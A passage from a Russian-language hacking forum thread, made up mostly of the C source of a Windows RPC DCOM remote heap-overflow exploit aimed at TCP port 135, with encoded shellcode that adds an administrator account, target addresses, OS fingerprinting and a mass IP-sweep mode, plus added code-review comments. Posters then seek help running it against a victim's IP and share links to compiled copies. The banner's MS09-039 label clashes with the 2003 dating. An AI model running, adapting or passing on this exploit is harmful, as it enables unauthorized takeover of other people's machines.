    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
    ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00};

    unsigned char request2[]={
    0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x5C,0x00,0x5C,0x00};

    unsigned char request3[]={
    0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00,
    0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
    ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};


    unsigned char request4[]={
    0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
    ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
    ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    };
    void XOR(unsigned char *buf,int offset,int lenght,unsigned char mask)
    {
    for(int i=offset;i<(offset+lenght);i++)
    buf=buf^mask;
    }
    DWORD GETSTRCS(char *buf)
    {
    DWORD cs=0;
    bool cld=false;
    for(unsigned int i=0;i<strlen(buf);i++)
    {
    for(int z=0;z<13;z++)
    {
    if(cs&1) cld=true;
    cs=cs>>1;
    if(cld) cs=cs|0x80000000;
    cld=false;
    }
    cs+=buf;
    }
    return cs;
    }

    struct {
    DWORD seh;
    DWORD jmp;
    DWORD heap;
    char target[200];
    } target_os[]=
    {
    {
    0x005Bfd2c,
    0x00081eeb,
    0x00180000,
    "WinXP"
    },
    {
    0x0095fd3c,
    0x00081eeb,
    0x00170000,
    "Win2K"
    }
    },v;
    unsigned char rawData1[]=
    "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00"
    "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00"

    "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e"
    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
    "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
    "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2"

    //SHELLCODE From SAM ,THANKs !
    //Add user SST,password is 557,
    "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF"

    "\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D"
    "\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C"
    "\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99"
    "\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9"
    "\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6"
    "\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED"
    "\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE"
    "\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12"
    "\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED"
    "\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA"
    "\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB"
    "\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66"
    "\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81"
    "\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A"
    "\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3"
    "\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78"
    "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
    "\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99"
    "\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12"
    "\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99"
    "\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66"

    "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
    "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
    "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
    "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a"
    "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90" //
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x77\xe0\x43\x00\x00\x10\x5c\x00"
    "\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26
    "\x4C\x14\xec\x77"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os


    //FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my artic
    //"Utilization of released heap structure and exploit of universal Heap overflow in windows ".
    "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
    "\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14"
    "\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA"
    "\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF"
    "\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99"
    "\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1"
    "\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7"
    "\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99"
    "\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA"
    "\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9"
    "\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1"
    "\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8"
    "\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99"
    "\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9"
    "\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99"
    "\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12"
    "\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98"
    "\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99"
    "\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12"
    "\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12"
    "\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA"
    "\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD"
    "\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A"
    "\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2"
    "\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12"
    "\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31"
    "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66"

    "\x04\x04\x00\x70\x00\x04\x40"
    "\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00"

    "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71";


    int version(char ip[16], int sock)
    {
    //un poco de ettercap...


    unsigned char peer0_0[] = {
    0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
    0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18,
    0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00,
    0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
    0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11,
    0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57,
    0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
    0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00,
    0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41,
    0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d,
    0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
    0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97,
    0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0,
    0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00 };


    unsigned char peer0_1[] = {
    0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
    0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
    0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20,
    0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53,
    0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00,
    0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11,
    0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb,
    0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
    0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00,
    0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00,
    0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00,
    0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
    0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00,
    0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,
    0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x07, 0x00 };

    /*

    unsigned char win2kvuln[] = {
    0x04, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00};
    */
    fd_set fds2;
    unsigned char buf[1024];

    int l;
    struct timeval tv2;
    FD_ZERO(&fds2);
    FD_SET(sock, &fds2);
    tv2.tv_sec = 6;
    tv2.tv_usec = 0;

    memset(buf,'\0',sizeof(buf));
    send(sock,(char *)peer0_0,sizeof(peer0_0),0);
    if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
    {
    l=recv (sock, (char *)buf, sizeof (buf),0);
    // for(i=0;i<52;i++)
    // {
    // if (i==28) i=i+4;
    // if (buf[i+32]!=win2kvuln)
    // {
    send(sock,(const char *)peer0_1,sizeof(peer0_1),0);
    if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
    {
    memset(buf,'\0',sizeof(buf));
    l=recv (sock, (char *)buf, sizeof (buf),0);
    if (l==32)
    {
    closesocket(sock);
    return(1);//winxp
    }
    else
    {
    #ifdef WIN32
    closesocket(sock);
    #else
    close(sock);
    #endif
    return(0);//win2kby default. Nt4 not added..
    }
    }
    else return(-1);
    // }


    //}
    // closesocket(sock);
    // return(0);//win2k
    }
    closesocket(sock);
    return(-1); //Unknown
    }
    /********************************************************************************/
    /*
     * attack: connects to ip1 on TCP port 135, calls version() to choose a
     * target_os[] entry, assembles the request buffer from rawData1 plus the
     * contents of the file "bshell2", then either sends that buffer repeatedly
     * (atack non-zero) or appends the fingerprint and address to fp1 (atack zero).
     * Returns 0 on socket/connect/send failure. On every other path the function
     * reaches its closing brace without a return statement, which is undefined
     * behaviour for a non-void function.
     */
    int attack(char *ip1,bool atack)
    {
    unsigned char rawData[1036];
    memcpy(rawData,rawData1,1036);
    unsigned char shellcode[50000];
    char ip[200];
    // NOTE(review): unbounded copy into a 200-byte buffer; ip1's length is never checked.
    strcpy(ip,ip1);
    WSADATA WSAData;
    SOCKET sock;
    int len,len1;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[50000];
    unsigned char buf2[50000];

    printf("%s\n",ip);
    //printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n");
    //printf("Code by FlashSky,Flashsky xfocus org\n");
    //printf("Welcome to our Site: http://www.xfocus.org\n");
    //printf("Welcome to our Site: http://www.venustech.com.cn\n");
    /* if(argc!=3)
    {
    printf("%s targetIP targetOS\ntargets:\n",argv[0]);
    for(int i=0;i<sizeof(target_os)/sizeof(v);i++)
    printf("%d - %s\n",i,target_os.target);
    printf("\n%x\n",GETSTRCS(argv[1]));
    return;
    }
    */
    /* if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
    printf("WSAStartup error.Error:%d\n",WSAGetLastError());
    return;
    }
    */
    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    // NOTE(review): inet_addr() returns INADDR_NONE for an unparsable string; not checked here.
    addr_in.sin_addr.S_un.S_addr=inet_addr(ip);

    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
    printf("Socket failed.Error:%d\n",WSAGetLastError());
    return 0;
    }
    len1=sizeof(request1);

    len=sizeof(rawData);

    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
    printf("%s - connect failed\n",ip);
    // NOTE(review): sock is leaked on this path (no closesocket before return).
    return 0;
    }

    int vers=!version(ip,sock);

    // printf("%d\n",vers);
    // return;
    // int vers=1;

    FILE *fp;

    //?? ?? ? ???
    // fp=fopen("shellcode","rb");
    // fread(rawData,1,1036,fp);
    // fclose(fp);
    //???? ??? ???? ?? ??????????? ?????? ?????!

    // NOTE(review): the fopen() result is not checked; if "bshell2" is missing,
    // fread() and fclose() are called on a NULL FILE* (undefined behaviour).
    fp=fopen("bshell2","rb");
    int sz=fread(shellcode,1,1024,fp);
    fclose(fp);
    // printf("%d\n",sz);
    for(int i=0;i<sz;i++)
    rawData[i+0x71]=shellcode;
    // fp=fopen("badfile.exe","rb");
    // unsigned int sz1=fread(shellcode,1,50000,fp);
    // fclose(fp);
    // for(i=0;i<sz1;i++)
    // rawData[i+0x240]=shellcode;

    // fp=fopen("pac","wb");
    // fwrite(rawData,1,1036,fp);
    // fclose(fp);

    // return;


    //??? ? ? ? ????? ? ??? ??? ???????? HEAP'a
    // DWORD heap=0x00180000;
    // int k=vers;
    // vers=1;
    // *(DWORD *)(rawData+0xae)=target_os[vers].heap;
    *(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap;
    //?????? ??? ?????? ? ? ???, ??? ?? ??? ??????? ??? ?
    XOR(rawData,0x71,sz,0x99);
    // XOR(rawData,0x240,sz1,0x99);
    //? ? ?? ? ? ??? ? ??? ?? ??? ? ? SEH ? JMP
    DWORD seh=target_os[vers].seh;
    DWORD jmp=target_os[vers].jmp;
    *(DWORD *)(rawData+0x22a)=jmp;
    *(DWORD *)(rawData+0x22e)=seh;
    // *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz));
    *(WORD *)(rawData+0x62)=sz;


    // NOTE(review): request2 is a file-scope array that is modified in place
    // here, so every call of attack() (and every thread in main()) keeps
    // adding to the same global bytes.
    memcpy(buf2,request1,sizeof(request1));
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2;
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2;
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);

    memcpy(buf2+len1,rawData,sizeof(rawData));
    len1=len1+sizeof(rawData);

    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc;

    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc;
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc;

    // The fingerprinting connection is closed; the atack branch opens a new one.
    closesocket(sock);
    if(atack)
    {
    // NOTE(review): neither socket() nor WSAConnect() is checked on this path.
    sock=socket(2,1,0);
    WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL);

    if (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
    {
    printf("%s - send failed %d\n",ip,WSAGetLastError());
    return 0;
    }
    else {printf("%s - send exploit to %s\n",ip,target_os[vers].target);}

    len=recv(sock,(char *)buf1,1000,NULL);
    bool ft=1;
    if(ft)
    {
    int i=0;
    // NOTE(review): this loop only exits through the error return; the send()
    // and closesocket() after it are unreachable on the success path.
    while(1)
    {
    if (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR)
    {
    printf("\nSend failed.Error:%d\n",WSAGetLastError());
    return 0;
    }
    else
    {
    printf("\r%d",++i);
    }
    //Sleep(1000);
    }
    }
    send(sock,(const char *)buf2,len1,0);
    closesocket(sock);
    }
    // fp1 is not declared in this part of the file -- presumably a file-scope
    // FILE* opened elsewhere; confirm, since a NULL stream here is UB.
    else fprintf(fp1,"%s %s\n",target_os[vers].target,ip);
    // fp=fopen("pac","wb");
    // fwrite(rawData,1,1036,fp);
    // fclose(fp);
    }
    // Shared state for the sweep mode in main(): thread_count is incremented and
    // decremented by every ThreadProc and read by main() without atomics or a
    // lock (data race), and adr[] is overwritten by main() with sprintf() while
    // worker threads may still be reading it through attack(adr,0).
    unsigned long thread_count=0;
    char adr[200];

    /*
     * ThreadProc: worker started by CreateThread() from main(). lpParameter is
     * ignored; the address is taken from the global adr[] instead, so every
     * thread reads whatever main() most recently wrote there. Always calls
     * attack() with atack=0 (fingerprint-and-log mode). The thread_count
     * updates are unsynchronised -- the count is advisory at best.
     */
    DWORD WINAPI ThreadProc(
    LPVOID lpParameter // thread data (unused)
    )
    {
    thread_count++;
    attack(adr,0);

    thread_count--;
    return 0;
    }

    /*
     * main: requires exactly one argument. If it contains a '.', attack() is
     * called on it once with atack=1 and the program exits with 2 after 20 s.
     * Otherwise execution falls into a two-octet sweep that reads argv[2..5] --
     * but the argc!=2 check above guarantees those indices are past the end of
     * argv, so that branch is undefined behaviour for any argument without a '.'.
     * fp1 is flushed and closed here but is never opened in this function and is
     * not declared in this part of the file -- presumably file-scope; confirm.
     * Exit codes: 10 usage error, 1 WSAStartup failure, 2 single-target run,
     * 0 after the sweep.
     */
    int main(int argc,char ** argv)
    {
    //printf("%x %x",OF_READWRITE,GETSTRCS(argv[1]));
    //return;
    //HFILE hf=_lopen("asd123",0x1001);
    //printf("%x",hf);
    //_lclose(hf);
    //return;

    if(argc!=2){
    fprintf(stderr, "RPC universal exploit. Exploit MS09-039 vulnerability\n"
    "unpatched host - to codee xecution\n"
    "patched host - to DoS\n"
    "based on original XFocus RPCDCOM2 exploit\n"
    "modification and shellcode (c) by karlss0n\n"
    "downloaded on www.k-otik.com\n"
    "\n"
    "usage: %s <target_ip>\n",
    argv[0]);
    return 10;
    }

    WSADATA wsaData;

    int wVersionRequested;
    wVersionRequested = MAKEWORD( 2, 2 );

    int err = WSAStartup( wVersionRequested, &wsaData );
    if ( err != 0 ) {
    /* Tell the user that we could not find a usable */
    /* WinSock DLL. */
    return 1;
    }


    if(strchr(argv[1],'.'))
    {
    attack(argv[1],1);
    Sleep(20000);
    return 2;
    }
    // NOTE(review): argc==2 here, so argv[3], argv[4], argv[5] below are out of
    // bounds of argv; atoi() on them is undefined behaviour. argv[2] in the
    // sprintf() below is the terminating NULL entry.
    int cb=1,db=1;
    cb=atoi(argv[3]);
    db=atoi(argv[4]);
    long tm=atoi(argv[5]);
    for(int c=cb;c<255;c++)
    {
    for(int d=db;d<255;d++)
    {
    // adr[] is shared with all running ThreadProc threads; see its declaration.
    sprintf(adr,"%s.%s.%d.%d",argv[1],argv[2],c,d);
    // Busy-wait (100 ms polls) while more than tm threads are alive; the
    // comparison is signed/unsigned (long vs unsigned long), so a negative tm
    // never throttles.
    if(thread_count>tm) while(thread_count>tm) Sleep(100);
    CreateThread(NULL,0,&ThreadProc,(void *)"",0,NULL);
    Sleep(10);
    fflush(fp1);
    }
    }
    Sleep(60000);
    fclose(fp1);
    return 0;

    }

    // milw0rm.com [2003-10-09]
    -----------------------------------------------
    этот скомпилился, но когда запускаешь, выдаёт следующее:
    без ввода параметров

    C:\Documents and Settings\Администратор>"C:\Documents and Settings\Администратор
    \Рабочий стол\sploit.exe"
    RPC universal exploit. Exploit MS09-039 vulnerability
    unpatched host - to codee xecution
    patched host - to DoS
    based on original XFocus RPCDCOM2 exploit
    modification and shellcode (c) by karlss0n
    downloaded on www.k-otik.com

    usage: C:\Documents and Settings\└фьшэшёЄЁрЄюЁ\╨рсюўшщ ёЄюы\sploit.exe <target_i
    p>
    с вводом параметра (*.*.*.* - ip жертвы)
    C:\Documents and Settings\Администратор>"C:\Documents and Settings\Администратор
    \Рабочий стол\sploit.exe" *.*.*.*
    *.*.*.*

    C:\Documents and Settings\Администратор>

    в общем, помогите, кто чем может
    ссылки на милворм:
    1 сплоит http://milw0rm.com/exploits/103
    2 сплоит http://milw0rm.com/exploits/109
     
  3. Rubaka

    Чем компилишь? Я http://milw0rm.com/exploits/103 скомпилил в Visual — норм!
     
  4. spider-intruder

    Вот оба сплоита, скомпиленные:
    http://www.sendspace.com/file/z0frfs
     